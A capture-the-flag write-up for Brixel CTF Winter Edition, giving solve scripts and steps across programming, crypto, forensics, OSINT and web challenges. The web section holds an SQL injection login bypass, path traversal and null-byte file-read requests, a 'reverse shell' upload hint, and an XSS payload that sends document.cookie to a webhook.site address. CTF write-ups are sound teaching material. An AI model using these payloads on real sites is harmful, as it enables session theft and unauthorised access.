Brixel CTF Winter Edition

Programming

Are you fast enough?

solve.sh

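#!/bin/bash
# Fetch the page (saving the session cookie), extract the random string,
# strip newlines and dashes, then post it back within the same session.
rndstring=$(curl -s http://timesink.be/speedy/index.php -c cookie.txt \
  | grep -oP '(?<=div id="rndstring" align="center">).*(?=<\/div><br>)' \
  | tr -d "\n" | tr -d -)
curl -s http://timesink.be/speedy/ -X POST -d "inputfield=${rndstring}" -b cookie.txt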

./solve.sh

<html><body><div align="center"><h1>Are you fast enough?</h1></div><hr><div align="center">You took: 0 second(s) to complete the task.</div><br><div align="center">Congratulations, you completed the task in under 1 seconds!</div><div algin="center">The flag is: <b>brixelCTF{sp33d_d3m0n}</b></div></body></html>%

solve.py

import re

import requests

t = "http://timesink.be/speedy"
s = requests.Session()

print(f"Requesting {t}...")
req = s.get(t)

# Raw string so that \w reaches the regex engine unchanged
p = re.compile(r'<div id="rndstring" align="center">(\w*)</div>')
random_str = p.search(req.text).group(1)
print(f"Got randomstring: {random_str}")

print("Posting...")
# The session keeps the cookie from the GET, so the POST belongs to the same attempt
r2 = s.post("http://timesink.be/speedy/index.php", data={"inputfield": random_str})
print(r2.text)

brixelCTF{sp33d_d3m0n}

Keep walking

solve.py

x = 1
y = 1
previous_answer = 1
answer = x * y + previous_answer + 3
while (x < 525):
    x = x + 1
    y = y + 1
    previous_answer = answer
    answer = x * y + previous_answer + 3
print ("answer="+str(answer))
print ("previous_answer="+str(previous_answer))
print ("x="+str(x))
print ("y="+str(y))
print ("formula: "+str(answer)+"="+str(x)+"*"+str(y)+"+"+str(previous_answer)+"+"+"3")

x = 1
y = 1
prev_answer = 1
answer = None
while x <= 525:
    answer = x*y + prev_answer + 3
    print(f"{x = } ==> {answer = }")
    x += 1
    y += 1
    prev_answer = answer

brixelCTF{48373851}

A song

Copy the song and paste into https://codewithrockstar.com/online

brixelCTF{5667236346614}

An arduino project

Quizbot

import requests
import json
from bs4 import BeautifulSoup as bs4

################################################################################
#
# Stage 1:
# 
# Request a session for the first "round". In this round we submit a lot of
# wrong answers and store the correct solution the server returns each time.
# The plan is to use these solutions in a second round to answer the questions.
#
########################################

# question_mapping maps each question to its answer
# load the stored data, if an earlier run saved any
question_mapping = {}
try:
    with open("solutions.json") as data:
        question_mapping = json.load(data)
except FileNotFoundError:
    pass  # first run: start with an empty mapping

s1 = requests.Session()

#for i in range(0, 2000):
i=0
while len(question_mapping) < 1000:
    print(f"\r{i}\t{len(question_mapping)}", end="", flush=True)
    r = s1.get("http://timesink.be/quizbot/index.php")
    soup = bs4(r.text, "html.parser")
    question = soup.h4.text

    # post with body:
    payload = {"insert_answer": "asdfghjkl", "submit": "answer"}
    r = s1.post("http://timesink.be/quizbot/index.php", data=payload)
    soup = bs4(r.text, "html.parser")
    answer = soup.find(id="answer").text

    question_mapping[question] = answer
    i+=1

# save the dict to json
with open("solutions.json", "w") as outfile:
    json.dump(question_mapping, outfile)

print("")

################################################################################
#
# Stage 2:
#
# Use the solutions collected in stage 1
#
########################################

# fresh session for the second round
s2 = requests.Session()

for i in range(0, 1100):
    try:
        r = s2.get("http://timesink.be/quizbot/index.php", timeout=10)
        soup = bs4(r.text, "html.parser")
        question = soup.h4.text
        # fall back to a dummy answer for questions not seen in stage 1
        answer = question_mapping.get(question, "abc")
        print(question)
        print(answer)
    except Exception:
        print("SOME ERROR OCCURRED")
        continue  # no question was fetched, so there is nothing to answer

    try:
        # post with body:
        payload = {"insert_answer": answer, "submit": "answer"}
        r = s2.post("http://timesink.be/quizbot/index.php", data=payload, timeout=10)
        print(r.text)
    except Exception:
        print("SOME ERROR OCCURRED")

brixelCTF{kn0wl3dg3}

Forensics

Message from Space

https://ourcodeworld.com/articles/read/956/how-to-convert-decode-a-slow-scan-television-transmissions-sstv-audio-file-to-images-using-qsstv-in-ubuntu-18-04

Download the app > Robot32 - SSTV Image Decoder
Listen to the WAV file and wait for the image to render

SSTV in Scottie1-Mode

brixelCTF{SP4C3L4B}

Lottery Ticket

  • Picture of lottery ticket
  • If you zoom in you see compression artifacts around most numbers
  • The edited numbers have none; sum them together > Flag is "203"

brixelCTF{203}

Lost evidence

Use foremost to extract the .wav
Decode the DTMF in the WAV file
You get the transaction reason:
cocaine

brixelCTF{cocaine}

OSINT

Visit Limburg #1

https://www.google.com/maps/d/viewer?mid=13WdFG3f5N8YGKQ6tTO4XTcxZlwFZ2Dgq&ll=50.693156402179554%2C5.707086178620777&z=16

Visit Limburg #2

3.05.13

7.05.09
https://www.google.com/maps/@50.9409526,5.4027559,3a,32.9y,53.72h,88.17t/data=!3m7!1e1!3m5!1spIOYm_3knO82AWp-QKjpBg!2e0!5s20130601T000000!7i13312!8i6656

Visit Limburg #3

https://www.openstreetmap.org/search?query=airport in limburg#map=11/51.0996/5.4437

Physical

https://www.bipt.be/operators/publication/database-with-reserved-and-allocated-numbers

https://osintframework.com/

Google Lens or Yandex Images

Eben-Ezer Tower

brixelCTF{Eben-Ezer}

Manhunt (1-n)

Facts:

  1. Johnny Dorfmeister: Taken from the EXIF-data of the image

  2. pishapasha: Googling the name takes you to this LinkedIn profile: https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/

  3. fav food: macaroni
    Taken from https://www.instagram.com/JohnnyDorfmeister/

  4. bday: tbd

  5. w@yb@ck!: Using the wayback-machine: https://web.archive.org/web/20190115103029/http://www.howitshould.be/test-page/ (Taken from his twitter-account @johnnydorfmeis1)

  6. poetry: Translate the Russian text on howitshould.be with Google.

  7. Fill in the contact form and his address will be presented

  8. "just_married": With google street view on the address from no. 7, move back in time

  9. g1ttern00b: Username "johnny", Password "letmein" taken from an old commit on GitHub

Reverse Engineering / cracking

Cookieee!

Cheatengine
search for the cookie amount
increase it
done

noPEEKing

strings on the exe

registerme.exe

strings on exe
create a file called register.key
start the exe

android app

Old tech

punchcard

Upload the punchcard here:
https://www.masswerk.at/cardreader/

brixelCTF{M41NFR4M3}

Goodbye old friend

Download the SWF
Extract the content
then again
search through the files till you find the flag

The tape

Crypto

Sea code

message.wav

- .... . ..-. .-.. .- --. ..-. --- .-. - .... .. ... -.-. .... .- .-.. .-.. . -. --. . .. ... ... . .- --. ..- .-.. .-.. 

theflagforthischallengeis seagull

brixelCTF{seagull}

Merde

vigenere with "confidentiel" as the key:

The flag is 

brixelCTF{baguette}

Merda

rot 21

brixelCTF{pizzanapoli}

s̸͖̾̀͊͠h̸̜̒ï̷̧̲͙̭̤͛͒̋t̷̢̲͚͖̑͜

base64 decode + binary decode

brixelCTF{robocop}

Scheiße

qbhbh zrmua gfbld ocqbv

derflagistsauerkraut
the flag is sauerkraut

brixelCTF{sauerkraut}

flawed

Username:admin

Passwordhash:d269ce15f9c44bc3992a5f4e5f273e06

brixelCTF{notsecure}

Don't be salty

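import hashlib

# Try every 5-letter lowercase candidate with the fixed suffix appended and
# print its MD5, to be matched against the target hash.
# range(97, 123) covers 'a'..'z'; an upper bound of 122 would skip 'z'.
for a in range(97, 123):
    for b in range(97, 123):
        for c in range(97, 123):
            for d in range(97, 123):
                for e in range(97, 123):
                    pw = chr(a) + chr(b) + chr(c) + chr(d) + chr(e)
                    pw += "04532@#!!"
                    print(pw, hashlib.md5(pw.encode('utf-8')).hexdigest())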

brixelCTF{brute}

Steganography

Doc-ception

unzip loremipsum.docx
unzip loremipsum
cat flag.txt
flag = openxml

brixelCTF{openxml}

Limewire audio

Audacity > Spectrogram

brixelCTF{hellokitty}

Scan Me

  • qr-code image
  • crop smaller qr-code image from first
  • go to website, scan barcode
  • enter result, scan next barcode, repeat
  • receive flag: brixelCTF{m4st3r_0f_sc4n5}

brixelCTF{m4st3r_0f_sc4n5}

Rufus the vampire cat

steghide info rufus.jpg

"rufus.jpg":
  format: jpeg
  capacity: 8.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "steganopayload639.txt":
    size: 85.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

steghide extract -sf rufus.jpg

Enter passphrase: 
wrote extracted data to "steganopayload639.txt".

less steganopayload639.txt

You thought this was a cute cat picture? NOPE! Chuck Testa! (the flag is:
chucktesta)

brixelCTF{chucktesta}

Internet

Easy

curl -s https://ctf.brixel.space/ | grep -i flag
        <!-- hidden flag: 'brixelCTF{notsosecret}' -->

brixelCTF{notsosecret}

Discord

5: Reading the rules gets you this flag: brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}

brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}

Hidden Code

https://www.brixel.be/

View page source code and find konami

/* <![CDATA[ */ var wpee_config = {"type":"konami","custom_code":"9","action":"move_image_across_middle","custom_js":"alert('test');","image":"http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif"}; /* ]]> */

http://brixel.be/wp-content/uploads/2016/10/15908854_90x90.png.gif

brixelCTF{Mario}

Hiding in the background

<style> body{color: #FFFFFF; background-color: #000000; background-image: url("/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg"); background-repeat: repeat; background-size: 50%;} </style>

wget https://ctf.brixel.space/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg

strings ctfbg.svg | grep -i ctf
sodipodi:docname="ctfbg.svg">
style="fill:#000000;fill-opacity:1;stroke-width:0.264583">brixelCTF{happy_holidays}

brixelCTF{happy_holidays}

Readme

https://ctf.brixel.space/guide

brixelCTF{freepoints}

robotopia

http://timesink.be/robotopia/robots.txt

brixelCTF{sadr0b0tz}

login1

plain text in javascript source

brixelCTF{w0rst_j4v4scr1pt_3v3r!}

login2

function verify() {
    password = "brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}"
    split = 6;
    if (password.substring(0, split) == 'brixel') {
        if (password.substring(split*6, split*7) == '180790') {
            if (password.substring(split, split*2) == 'CTF{st') {
                if (password.substring(split*4, split*5) == '5cr1pt') {
                    if (password.substring(split*3, split*4) == 'd_j4v4') {
                        if (password.substring(split*5, split*6) == '_h3r3.') {
                            if (password.substring(split*2, split*3) == '1ll_b4') {
                                if (password.substring(split*7, split*8) == '54270}') {
                                    console.log("Password Verified")
                                }
                            }
                        }
                    }
                }
            }
        }
    } else {
        console.log("Incorrect password");
    }
}
verify()

brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}

login3

http://timesink.be/login3/password.txt

brixelCTF{n0t_3v3n_cl05e_t0_s3cur3!}

login4

http://timesink.be/login4/password.txt + base64 decode

brixelCTF{even_base64_wont_make_you_secure}

login5

function verify() {
    var _0x41653e = _0x58ab;
    password = document[
        _0x41653e(0x194)
    ](_0x41653e(0x192))['value'],
    alphabet = _0x41653e(0x193),
    newpassword = alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x11, 0x1), // r
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](0x17, 0x1), // x
    newpassword = newpassword + alphabet['substr'](0x4, 0x1), // e
    newpassword = newpassword + alphabet['substr'](0xb, 0x1), // l
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](39 - 0x2, 0x1), // {
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1),  // 0
    newpassword = newpassword + alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](0x14, 0x1), // u
    newpassword = newpassword + alphabet['substr'](0x12, 0x1), // s
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x0, 0x1), // a
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
    newpassword = newpassword + alphabet['substr'](0xd, 0x1), // n
    newpassword = newpassword + alphabet['substr'](39 - 0x1, 0x1), // }
    password == newpassword ? alert(_0x41653e(0x196)) : alert(_0x41653e(0x195));
}

brixelctf{0bfuscati0n}
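
The same recovery done statically, without running the page's script, as an added example that is not part of the original writeup. It shows why a comparison string assembled in client-side JavaScript is readable by anyone who receives the page. The alphabet is an assumption reconstructed only from the comments in the listing above, and `JS_SAMPLE` is that listing's `substr()` calls condensed.

```python
import re

# Assumed alphabet: only the slots the writeup's comments confirm are filled
# (a-z at 0-25, '0' at 35, '{' at 37, '}' at 38); unknown slots are '?'.
ALPHABET = "abcdefghijklmnopqrstuvwxyz" + "?" * 9 + "0" + "?" + "{}"

# The substr() calls from the listing above, condensed onto fewer lines.
JS_SAMPLE = """
alphabet['substr'](0x1, 0x1) alphabet['substr'](0x11, 0x1) alphabet['substr'](0x8, 0x1)
alphabet['substr'](0x17, 0x1) alphabet['substr'](0x4, 0x1) alphabet['substr'](0xb, 0x1)
alphabet['substr'](0x2, 0x1) alphabet['substr'](0x13, 0x1) alphabet['substr'](0x5, 0x1)
alphabet['substr'](39 - 0x2, 0x1) alphabet['substr'](39 - 0x4, 0x1) alphabet['substr'](0x1, 0x1)
alphabet['substr'](0x5, 0x1) alphabet['substr'](0x14, 0x1) alphabet['substr'](0x12, 0x1)
alphabet['substr'](0x2, 0x1) alphabet['substr'](0x0, 0x1) alphabet['substr'](0x13, 0x1)
alphabet['substr'](0x8, 0x1) alphabet['substr'](39 - 0x4, 0x1) alphabet['substr'](0xd, 0x1)
alphabet['substr'](39 - 0x1, 0x1)
"""

NUM = r"(?:0x[0-9a-fA-F]+|\d+)"
CALL = re.compile(r"alphabet\['substr'\]\(\s*([^,()]+?)\s*,\s*([^,()]+?)\s*\)")


def eval_literal_expr(expr):
    """Evaluate sums/differences of decimal and hex literals without eval()."""
    expr = expr.replace(" ", "")
    if not re.fullmatch(NUM + r"(?:[+-]" + NUM + r")*", expr):
        raise ValueError(f"unsupported index expression: {expr!r}")
    total, sign = 0, 1
    for tok in re.findall(r"[+-]|" + NUM, expr):
        if tok in ("+", "-"):
            sign = 1 if tok == "+" else -1
        else:
            total += sign * int(tok, 0)
    return total


def recover_constant(js, alphabet=ALPHABET):
    """Rebuild the string the script compares against from its substr() calls."""
    parts = []
    for start, length in CALL.findall(js):
        i, n = eval_literal_expr(start), eval_literal_expr(length)
        parts.append(alphabet[i:i + n])  # JS substr(start, length)
    return "".join(parts)


if __name__ == "__main__":
    print(recover_constant(JS_SAMPLE))
```

A `?` in the output would mean the script indexes a slot of the alphabet that the listing's comments do not reveal.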

Browsercheck

Google search to identify user-agent used by "ask jeeves crawler"
curl 'http://timesink.be/browsercheck/' -H 'User-Agent: Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)'

<html><body><div align="center"><h1>congratulations</h1>the flag is 'brixelCTF{askwho?}'</div></body></html>

brixelCTF{askwho?}

SnackShack awards

curl 'http://timesink.be/snackshackaward/stemmen.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://timesink.be' -H 'Connection: keep-alive' -H 'Referer: http://timesink.be/snackshackaward/index.html' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'score_bammens=0&score_omejan=0&score_fontainas=0&score_tpleintje=5000&score_frietuurtje=0'

brixelCTF{bakpau}

Flat earth

brute force username and login here: http://timesink.be/flatearth/admin.php

' OR ''=' --

brixelCTF{aroundtheglobe}

Dadjokes

Upload reverse shell here:
http://timesink.be/dadjokes/jokes/submit.php

File Read:
http://timesink.be/dadjokes/jokes/read.php?file=mugged.txt

http://timesink.be/dadjokes/jokes/submit.php?filename=%3C?php%20echo%20\

Notice: Undefined index: title in /home/kevinay5/domains/timesink.be/public_html/dadjokes/jokes/submit.php on line 47
please provide a title

The solution is to fix the page; doing so gives you the solution.

curl 'http://timesink.be/dadjokes/jokes/submit.php?filename=../index.html&title=index&submit=true&content=%0D%0A%3Chtml%3E%3Ctitle%3EDadJokes%2C+your+source+of+lame+dad+jokes%3C%2Ftitle%3E%3Cbody%3E%3Cdiv+align%3D%22center%22%3E%3Ch1%3EDadJokes%3C%2Fh1%3E%3Chr%3E%3Cimg+src%3D%22images%2Fbanner.png%22+alt%3D%22dadjokes%22%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fread.php%22%3ERead+dad+jokes%3C%2Fa%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fsubmit.php%22%3Esubmit+your+own+jokes%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fhtml%3E'

document.write('<img src="https://webhook.site/#!/0129c597-c633-4ef5-b4bb-c2ee2a805adc?cookie=' + document.cookie + '" />')

Pathfinders #1

index.php loads whatever file the page parameter names, without any restriction, so simply request:
http://timesink.be/pathfinder/index.php?page=admin/.htpasswd

brixelCTF{unsafe_include}

Pathfinders #2

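index.php again loads files without any restriction, so simply request the same file with %00.php appended (on an outdated PHP the null byte ends the path before the trailing .php):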
http://timesink.be/pathfinder2/index.php?page=admin/.htpasswd%00.php

brixelCTF{outdated_php}
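
Both Pathfinders flaws next to an allowlist fix, as an added example that is not the challenge's source and is modelled in Python rather than the site's PHP. The logic in `include_v1` and `include_v2`, the page names in `ALLOWED_PAGES` and the file contents are assumptions; only the two request values come from the URLs above.

```python
import os
import tempfile
from urllib.parse import unquote

# Hypothetical allowlist: public page name -> file below the web root.
ALLOWED_PAGES = {"home": "pages/home.php", "about": "pages/about.php"}

def read(root, rel):
    with open(os.path.join(root, rel), encoding="utf-8") as fh:
        return fh.read()

def include_v1(root, page):
    """Assumed Pathfinders #1 logic: the parameter is used as the path."""
    return read(root, page)

def include_v2(root, page):
    """Assumed Pathfinders #2 logic: a .php suffix check, then an open that
    stops at the first NUL byte, as file APIs did in old PHP releases."""
    if not page.endswith(".php"):
        return None
    return read(root, page.split("\x00", 1)[0])

def include_hardened(root, page):
    """The parameter only selects an allowlist entry; it never becomes a path."""
    rel = ALLOWED_PAGES.get(page)
    return read(root, rel) if rel else None

def demo():
    files = {"pages/home.php": "welcome", "pages/about.php": "about",
             "admin/.htpasswd": "admin:PLACEHOLDER_HASH"}  # constructed content
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        plain = unquote("admin/.htpasswd")          # query value from #1
        nul = unquote("admin/.htpasswd%00.php")     # query value from #2
        return {
            "v1": include_v1(root, plain),
            "v2_plain": include_v2(root, plain),
            "v2_nul": include_v2(root, nul),
            "hardened": [include_hardened(root, p) for p in (plain, nul)],
            "hardened_home": include_hardened(root, "home"),
        }

if __name__ == "__main__":
    print(demo())
```

The suffix check in `include_v2` blocks the plain request but not the NUL variant, while the allowlist lookup rejects both because the request value is never joined into a filesystem path.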